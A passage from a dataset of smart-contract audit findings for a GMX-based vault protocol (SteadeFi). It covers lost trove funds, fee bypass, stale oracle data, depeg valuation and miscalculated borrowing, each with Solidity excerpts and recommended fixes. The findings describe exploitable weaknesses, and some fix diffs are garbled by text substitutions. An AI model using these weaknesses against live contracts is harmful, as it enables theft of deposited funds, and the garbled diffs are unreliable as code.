normal way during this situation, because of a status change. Therefore, all the acquired yield will be lost.\\nWhen users deposit, or withdraw tokens, all acquired yield from GMX is sent to the trove contract:\\n```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n\\n```\\nfunction withdraw(\\n GMXTypes.Store storage self,\\n GMXTypes.WithdrawParams memory wp\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of withdrawers assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n\\nThe only way in the system to claim these yield is the compound function, which calls the beforeCompoundChecks function:\\n```\\nfunction compound(\\n GMXTypes.Store storage self,\\n GMXTypes.CompoundParams memory cp\\n) external {\\n // Transfer any tokenA/B from trove to vault\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(\\n address(self.trove),\\n address(this),\\n self.tokenA.balanceOf(address(self.trove))\\n );\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(\\n address(self.trove),\\n address(this),\\n self.tokenB.balanceOf(address(self.trove))\\n );\\n }\\n // rest of code\\n GMXChecks.beforeCompoundChecks(self);\\n // rest of code\\n}\\n```\\n\\nThis function reverts if the current status of the system is not Open or Compound_Failed:\\n```\\nfunction beforeCompoundChecks(\\n GMXTypes.Store storage self\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Compound_Failed\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n // rest of code\\n}\\n```\\n\\nAs the emergency close flow updates this status to Paused and later to Closed, calling compound will revert:\\n```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n\\n```\\nfunction emergencyClose(\\n GMXTypes.Store storage self,\\n uint256 deadline\\n) external {\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n ) = GMXManager.calcRepay(self, 1e18);\\n\\n (\\n bool _swapNeeded,\\n address _tokenFrom,\\n address _tokenTo,\\n uint256 _tokenToAmt\\n ) = GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n\\n GMXManager.repay(\\n self,\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n );\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n );\\n}\\n```\\n\\nAnd as we can see during these process the funds inside the trove contract are never claimed and as the strategy vault is the only address that can claim the funds of the trove, all funds are gone.\\n```\\ncontract GMXTrove {\\n\\n /* ==================== STATE VARIABLES ==================== */\\n\\n // Address of the vault this trove handler is for\\n IGMXVault public vault;\\n\\n /* ====================== CONSTRUCTOR ====================== */\\n\\n /**\\n * @notice Initialize trove contract with associated vault address\\n * @param _vault Address of vault\\n */\\n constructor (address _vault) {\\n vault = IGMXVault(_vault);\\n\\n GMXTypes.Store memory _store = vault.store();\\n\\n // Set token approvals for this trove's vault contract\\n _store.tokenA.approve(address(vault), type(uint256).max);\\n _store.tokenB.approve(address(vault), type(uint256).max);\\n }\\n}\\n```\\n",Transfer the funds inside the trove into the vault during the emergency close process.,"If a strategy vault is closed, all funds in the trove are lost.","```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n" +emergencyResume does not handle the afterDepositCancellation case correctly,medium,"The `emergencyResume` function is intended to recover the vault's liquidity following an `emergencyPause`. It operates under the assumption of a successful deposit call. However, if the deposit call is cancelled by GMX, the `emergencyResume` function does not account for this scenario, potentially locking funds.\\nWhen `emergencyResume` is invoked, it sets the vault's status to ""Resume"" and deposits all LP tokens back into the pool. The function is designed to execute when the vault status is ""Paused"" and can be triggered by an approved keeper.\\n```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nShould the deposit fail, the callback contract's `afterDepositCancellation` is expected to revert, which does not impact the continuation of the GMX execution. After the cancellation occurs, the vault status is ""Resume"", and the liquidity is not re-added to the pool.\\n```\\nfunction afterDepositCancellation(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (_store.status == GMXTypes.Status.Deposit) {\\n if (_store.depositCache.depositKey == depositKey)\\n vault.processDepositCancellation();\\n } else if (_store.status == GMXTypes.Status.Rebalance_Add) {\\n if (_store.rebalanceCache.depositKey == depositKey)\\n vault.processRebalanceAddCancellation();\\n } else if (_store.status == GMXTypes.Status.Compound) {\\n if (_store.compoundCache.depositKey == depositKey)\\n vault.processCompoundCancellation();\\n } else {\\n revert Errors.DepositCancellationCallback();\\n }\\n }\\n```\\n\\nGiven this, another attempt to execute `emergencyResume` will fail because the vault status is not ""Paused"".\\n```\\nfunction beforeEmergencyResumeChecks (\\n GMXTypes.Store storage self\\n ) external view {\\n if (self.status != GMXTypes.Status.Paused)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n }\\n```\\n\\nIn this state, an attempt to revert to ""Paused"" status via `emergencyPause` could fail in GMXManager.removeLiquidity, as there are no tokens to send back to the GMX pool, leading to a potential fund lock within the contract.","To address this issue, handle the afterDepositCancellation case correctly by allowing emergencyResume to be called again.",The current implementation may result in funds being irretrievably locked within the contract.,"```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n" +A depositor of the GMXVault can bypass paying the fee when the depositor deposit into the GMXVault.,medium,"The fee-minted in the form of shares (svTokens) would not be subtracted from the amount of shares (svTokens) to be minted to the GMXVault's depositor.\\nDue to that, a depositor of the GMXVault could receive the amount of the shares (svTokens), which the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() was not subtracted.\\nThis means that a depositor of the GMXVault can bypass paying the fee when the depositor deposit into the GMXVault.\\nWithin the GMXDeposit#deposit(), the GMXVault#mintFee() would be called to mint the fee in the form of the svTokens like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L119\\n```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n * @param isNative Boolean as to whether user is depositing native asset (e.g. ETH, AVAX, etc.)\\n */\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n // rest of code\\n self.status = GMXTypes.Status.Deposit;\\n\\n self.vault.mintFee(); ///<----------------------- @audit\\n // rest of code\\n```\\n\\nWithin the GMXVault#mintFee(), the amount (GMXReader.pendingFee(_store)) of the shares would be minted to the treasury (_store.treasury) in the form of the svTokens like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXVault.sol#L335\\n```\\n /**\\n * @notice Mint vault token shares as management fees to protocol treasury\\n */\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store)); ///<------------ @audit\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n\\nWhen callback of deposit, the the GMXDeposit#processDeposit() would be called via the GMXVault#deposit().\\nWithin the GMXDeposit#processDeposit(), the amount (self.depositCache.sharesToUser) of shares (VaultTokens) would be minted to the GMXVault's depositor (self.depositCache.user) like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L172\\n```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n */\\n function processDeposit(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeProcessDepositChecks(self);\\n\\n // We transfer the core logic of this function to GMXProcessDeposit.processDeposit()\\n // to allow try/catch here to catch for any issues or any checks in afterDepositChecks() failing.\\n // If there are any issues, a DepositFailed event will be emitted and processDepositFailure()\\n // should be triggered to refund assets accordingly and reset the vault status to Open again.\\n try GMXProcessDeposit.processDeposit(self) {\\n // Mint shares to depositor\\n self.vault.mint(self.depositCache.user, self.depositCache.sharesToUser); ///<------------- @audit\\n // rest of code\\n```\\n\\nWithin the GMXDeposit#processDeposit() above, the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() is supposed to be subtracted from the amount of the shares to be minted to the GMXVault's depositor via the GMXDeposit#processDeposit().\\nHowever, there is no logic to subtract the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() from the amount of the shares to be minted to the GMXVault's depositor in the form of the shares (svTokens) via the GMXDeposit#processDeposit().","Within the GMXDeposit#processDeposit(), consider adding a logic to subtract the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() from the amount of the shares to be minted to the GMXVault's depositor in the form of the shares (svTokens) via the GMXDeposit#processDeposit().","The depositor could receive the amount of the shares (svTokens), which the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() was not subtracted.\\nThis means that a depositor of the GMXVault can bypass paying the fee when the depositor deposit into the GMXVault.","```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n * @param isNative Boolean as to whether user is depositing native asset (e.g. ETH, AVAX, etc.)\\n */\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n // rest of code\\n self.status = GMXTypes.Status.Deposit;\\n\\n self.vault.mintFee(); ///<----------------------- @audit\\n // rest of code\\n```\\n" +Incorrect depositable shortToken amount calculation in Delta neutral vaults,medium,"When calculating the maximum possible depositable amount for delta neutral vaults, `_maxTokenBLending` is calculated incorrectly.\\n```\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n (uint256 _tokenAWeight, ) = tokenWeights(self);\\n\\n\\n uint256 _maxTokenALending = convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenALendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER);\\n\\n\\n uint256 _maxTokenBLending = convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n - 1e18;\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXReader.sol#L254-L270\\nIf `a` user wants to deposit `v` value to `a` `l` leveraged delta neutral vault with token weights `a` and `b`, the calculation of required lending amount would be as follows:\\n```\\nTotal value to deposit to GMX = lv\\nValue of tokens to short = lva\\nHence this value will be borrowed from the tokenA lending vault\\nRemaining value to borrow (from tokenB lending vault) = lv - lva - v (deposit value provided by user)\\nHence if there is Tb value of tokens in tokenB lending vault, v <= Tb / (l - la - 1)\\n```\\n","Change the formula to the correct one.\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/strategy/gmx/GMXReader.sol b/contracts/strategy/gmx/GMXReader.sol\\nindex 73bb111..ae819c4 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/strategy/gmx/GMXReader.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/strategy/gmx/GMXReader.sol\\n@@ // Remove the line below\\n266,8 // Add the line below\\n266,7 @@ library GMXReader {\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n// Remove the line below\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n// Remove the line below\\n // Remove the line below\\n 1e18;\\n// Add the line below\\n / (self.leverage // Remove the line below\\n (self.leverage *_tokenAWeight / SAFE_MULTIPLIER) // Remove the line below\\n 1e18);\\n \\n _additionalCapacity = _maxTokenALending > _maxTokenBLending ? _maxTokenBLending : _maxTokenALending;\\n }\\n```\\n","Deposit attempts can revert even when there is enough tokens to lend causing inefficiency, loss of gas for depositors and deviation from the protocol specification.","```\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n (uint256 _tokenAWeight, ) = tokenWeights(self);\\n\\n\\n uint256 _maxTokenALending = convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenALendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER);\\n\\n\\n uint256 _maxTokenBLending = convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n - 1e18;\\n```\\n" +GMXOracle.sol#L280: function `getLpTokenAmount` icorrectly assumes that the returned price is in 18 decimal places. But it is 30 decimal places.,low,"`GMXOracle` oracle has a function getLpTokenAmount which is in scope. This is Used in keeper script to calculate how much LP tokens for given USD value.\\nThis function returns the `lpTokenAmount` with 30 decimal places instead of 18 as the function assumes.\\nLets look at the function getLpTokenAmount\\n```\\n /**\\n * @notice Get token A and token B's LP token amount required for a given value\\n * @param givenValue Given value needed, expressed in 1e30 -------------------------- refer this\\n * @param marketToken LP token address\\n * @param indexToken Index token address\\n * @param longToken Long token address\\n * @param shortToken Short token address\\n * @param isDeposit Boolean for deposit or withdrawal\\n * @param maximize Boolean for minimum or maximum price\\n * @return lpTokenAmount Amount of LP tokens; expressed in 1e18 --------------> refer this\\n */\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue;\\n }\\n```\\n\\nSAFE_MULTIPLIER is in 18 decimal places.\\nThe values returned from the function `_lpTokenValue` is in 18 decimal places. Refer the line\\nSo the final returned value from the function `getLpTokenAmount` is (1e30 * 1e18) / 1e18 = 1e30","GMXOracle.sol#L280: function `getLpTokenAmount` icorrectly assumes that the returned price is in 18 decimal places. But it is 30 decimal places.\\nUpdate the function `getLpTokenAmount` as shown below.\\n```\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue; ------ remove\\n\\n return (givenValue * SAFE_MULTIPLIER) / (_lpTokenValue * 1e12); ---- add\\n \\n }\\n```\\n",Overestimating the lpToken amount for the given USD value.,"```\\n /**\\n * @notice Get token A and token B's LP token amount required for a given value\\n * @param givenValue Given value needed, expressed in 1e30 -------------------------- refer this\\n * @param marketToken LP token address\\n * @param indexToken Index token address\\n * @param longToken Long token address\\n * @param shortToken Short token address\\n * @param isDeposit Boolean for deposit or withdrawal\\n * @param maximize Boolean for minimum or maximum price\\n * @return lpTokenAmount Amount of LP tokens; expressed in 1e18 --------------> refer this\\n */\\n function getLpTokenAmount(\\n uint256 givenValue,\\n address marketToken,\\n address indexToken,\\n address longToken,\\n address shortToken,\\n bool isDeposit,\\n bool maximize\\n ) public view returns (uint256) {\\n uint256 _lpTokenValue = getLpTokenValue(\\n marketToken,\\n indexToken,\\n longToken,\\n shortToken,\\n isDeposit,\\n maximize\\n );\\n\\n\\n return givenValue * SAFE_MULTIPLIER / _lpTokenValue;\\n }\\n```\\n" +`Chainlink.latestRoundData()` may return stale results,low,"The `_getChainlinkResponse()` function is used to get the price of tokens, the problem is that the function does not check for stale results.\\nThe `ChainlinkOracle._getChainlinkResponse()` function is used to get latest Chainlink response.\\n```\\nfunction _getChainlinkResponse(address _feed) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _chainlinkResponse;\\n\\n _chainlinkResponse.decimals = AggregatorV3Interface(_feed).decimals();\\n\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n\\n _chainlinkResponse.roundId = _latestRoundId;\\n _chainlinkResponse.answer = _latestAnswer;\\n _chainlinkResponse.timestamp = _latestTimestamp;\\n _chainlinkResponse.success = true;\\n\\n return _chainlinkResponse;\\n }\\n```\\n\\nThe problem is that there is not check for stale data. There are some reasons that the price feed can become stale.","Read the updatedAt return value from the `Chainlink.latestRoundData()` function and verify that is not older than than specific time tolerance.\\n```\\nrequire(block.timestamp - udpatedData < toleranceTime, ""stale price"");\\n```\\n","Since the token prices are used in many contracts, stale data could be catastrophic for the project.","```\\nfunction _getChainlinkResponse(address _feed) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _chainlinkResponse;\\n\\n _chainlinkResponse.decimals = AggregatorV3Interface(_feed).decimals();\\n\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n\\n _chainlinkResponse.roundId = _latestRoundId;\\n _chainlinkResponse.answer = _latestAnswer;\\n _chainlinkResponse.timestamp = _latestTimestamp;\\n _chainlinkResponse.success = true;\\n\\n return _chainlinkResponse;\\n }\\n```\\n" +"USDC is not valued correctly in case of a depeg, which causes a loss of funds",low,"USDC is not valued correctly in case of a depeg, which causes a loss of funds.\\nThe protocol uses a chainlink feed to get prices of a specific token. In this case the token of interest is USDC which is a stable coin. Let us get some context for this issue, from the GMX V2 documentation we can read the following:\\nIn case the price of a stablecoin depegs from 1 USD: To ensure that profits for all short positions can always be fully paid out, the contracts will pay out profits in the stablecoin based on a price of 1 USD or the current Chainlink price for the stablecoin, whichever is higher. For swaps using the depegged stablecoin, a spread from 1 USD to the Chainlink price of the stablecoin will apply. If Chainlink Data Stream prices are used then the spread would be from the data stream and may not be to 1 USD.\\nhttps://gmx-docs.io/docs/trading/v2\\nFrom the above snippet we now know that gmx will never value USDC below 1$ when closing a short or withdrawing from a position, and that gmx uses the spread from 1 usd to the chainlink price is used. The problem here is that Steadefi does not account for this and will continue to use the chainlink price of usdc in a withdraw and swap when calculating the appropriate slippage amount. Let me demonstrate.\\n```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);\\n\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n\\nHere consult calls `_getChainlinkResponse(_feed)` which gets the current value of a token, for our purpose this token is USDC. The problem begins because consult is called by `consultIn18Decimals` and this is called by `convertToUsdValue`, this is then called by `calcMinTokensSlippageAmt`. This function decides how much slippage is appropriate given the value of the asset being withdrawn. The problems is, as i showed, it will use chainlink value of USDC and in case of a depeg, it will use the depegged value. But as i have shown from gmx docs, when withdrawing, the value of USDC will always be valued at 1 or higher. So now we are calculating slippage for a usdc value that is depegged when we are withdrawing on gmx with the pegged assets normal value.\\nFor example\\nthere is a depeg of usdc\\nusdc chainlink value is $ 0.4\\ngmx withdraw value is always $1\\nbecause we use the chainlink value to calc slippage tolerance, we will be using the slippage tolerance for a USDC price of 0.4 when in fact we are valuing USDC at $1 in gmx. The amount of slippage allowed will be very incorrect and in some cases extreme. In case of total depeg, slippage will be almost 99% and users may lose almost all of their funds when trying to withdraw.","implement logic specific to stablecoins to handle depegs events. Such would be to always value stable coins at the maximum of the stablecoing proposed value and the chainlink response value. Currently we are only using the chainlink response answer to valuate stable coins like usdc, and as i have explained this is a problem.","In case of total depeg, slippage will be almost 99% and users may lose almost all of their funds when trying to withdraw.","```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);\\n\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n" +Depositing to the GMX POOl will return sub-optimal return if the Pool is imbalanced,medium,"Whenever A user deposits tokens to vault, vault create a leverage position depending[delta or delta neutral] in the GMX POOl. performing a proportional deposit is not optimal in every case and depositng tokens in such case will result in fewer LP tokens due to sub optimal trade. Eventually leading to a loss of gain for the strategy vault\\nAlice deposits token A() into the vault to make Delta.Neutral position\\n```\\nFile: GMXVault.sol\\n\\n function deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n```\\n\\nvault refer to deposit to GMXDeposit library to execute the further logic\\n```\\nFile: GMXDeposit.sol\\n\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n[// rest of code// rest of code// rest of code// rest of code// rest of code.]\\n // Borrow assets and create deposit in GMX\\n (\\n uint256 _borrowTokenAAmt,\\n uint256 _borrowTokenBAmt\\n ) = GMXManager.calcBorrow(self, _dc.depositValue);\\n\\n [// rest of code// rest of code// rest of code]\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L54\\nwhich calls calcBorrow on GMXManager Library for borrowing assets and making the position IN GMX POOL\\n```\\nFile: GMXManager.sol\\n\\n /**\\n * @notice Calculate amount of tokenA and tokenB to borrow\\n * @param self GMXTypes.Store\\n * @param depositValue USD value in 1e18\\n */\\n function calcBorrow(\\n GMXTypes.Store storage self,\\n uint256 depositValue\\n ) external view returns (uint256, uint256) {\\n // Calculate final position value based on deposit value\\n uint256 _positionValue = depositValue * self.leverage / SAFE_MULTIPLIER;\\n\\n // Obtain the value to borrow\\n uint256 _borrowValue = _positionValue - depositValue;\\n\\n uint256 _tokenADecimals = IERC20Metadata(address(self.tokenA)).decimals();\\n uint256 _tokenBDecimals = IERC20Metadata(address(self.tokenB)).decimals();\\n uint256 _borrowLongTokenAmt;\\n uint256 _borrowShortTokenAmt;\\n\\n [// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code..]\\n\\n // If delta is neutral, borrow appropriate amount in long token to hedge, and the rest in short token\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n // Get token weights in LP, e.g. 50% = 5e17\\n (uint256 _tokenAWeight,) = GMXReader.tokenWeights(self);\\n\\n // Get value of long token (typically tokenA)\\n uint256 _longTokenWeightedValue = _tokenAWeight * _positionValue / SAFE_MULTIPLIER;\\n\\n // Borrow appropriate amount in long token to hedge\\n _borrowLongTokenAmt = _longTokenWeightedValue * SAFE_MULTIPLIER\\n / GMXReader.convertToUsdValue(self, address(self.tokenA), 10**(_tokenADecimals))\\n / (10 ** (18 - _tokenADecimals));\\n\\n // Borrow the shortfall value in short token\\n _borrowShortTokenAmt = (_borrowValue - _longTokenWeightedValue) * SAFE_MULTIPLIER\\n / GMXReader.convertToUsdValue(self, address(self.tokenB), 10**(_tokenBDecimals))\\n / (10 ** (18 - _tokenBDecimals));\\n }\\n[// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code// rest of code]\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXManager.sol#L70\\nHere it consider the current reserve ratio of the pool and deposits in the same ratio.\\nWhile GMX docs clearly state that If deposits try to create balance in the pool[depositing in such way which will make actual token weight of index Token towards the TOKEN_WEIGHT defined in the pool] will get benefit technically more LP tokens and oppose to this less LP token if current deposits imbalance the Pool reserve the ratio Reference\\nEven Curve pools work in the same way. Depositer get benefit if they try to balance the pool reserve making them optimal",Depositing to the GMX POOl will return sub-optimal return if the Pool is imbalanced\\nconsider implementing check and if the pool is imablanced depositing(making levearge position) towards balancing the Index Token's weight will give optimal returns[extra LP tokens ],"It is clear that Weight of index token will not be always near equal to the Defined Total_Weight of the Pool. So if the pool is imbalanced Depositing into GMXPool will not give optimal returns( resulting in fewer LP token), eventually leading to the loss of gain for the depositers affecting net APR","```\\nFile: GMXVault.sol\\n\\n function deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n```\\n" +The `svTokenValue` function can return overestimated value of each strategy vault share token,medium,"The `GMXReader.svTokenValue` function can return overestimated value of each strategy vault share token due to outdated `totalSupply`, i.e. without including pending management fees for a long period. This issue can cause the protocol unexpected behavior while keepers provide rebalance and when other protocols receive information about shares value.\\nThe `svTokenValue` function calculates the value of each strategy vault share token with the current amount of `totalSupply`, which may not include pending management fees:\\n```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n }\\n```\\n\\nSo the returned share value will be overestimated. The longer the period since the last `mintFee` was called the more overestimated shares value is.",Consider adding `pendingFee` to the totalSupply:\\n```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || totalSupply_ == 0) return SAFE_MULTIPLIER;\\n// Remove the line below\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n// Add the line below\\n return equityValue_ * SAFE_MULTIPLIER / (totalSupply_ // Add the line below\\n pendingFee(self));\\n } \\n```\\n,The `GMXReader.svTokenValue` function returns an overestimated value of the share token. This issue can cause the protocol unexpected behavior while keepers provide rebalance and when other protocols receive information about the shares value.\\nTools used\\nManual Review,```\\n function svTokenValue(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 equityValue_ = equityValue(self);\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n if (equityValue_ == 0 || 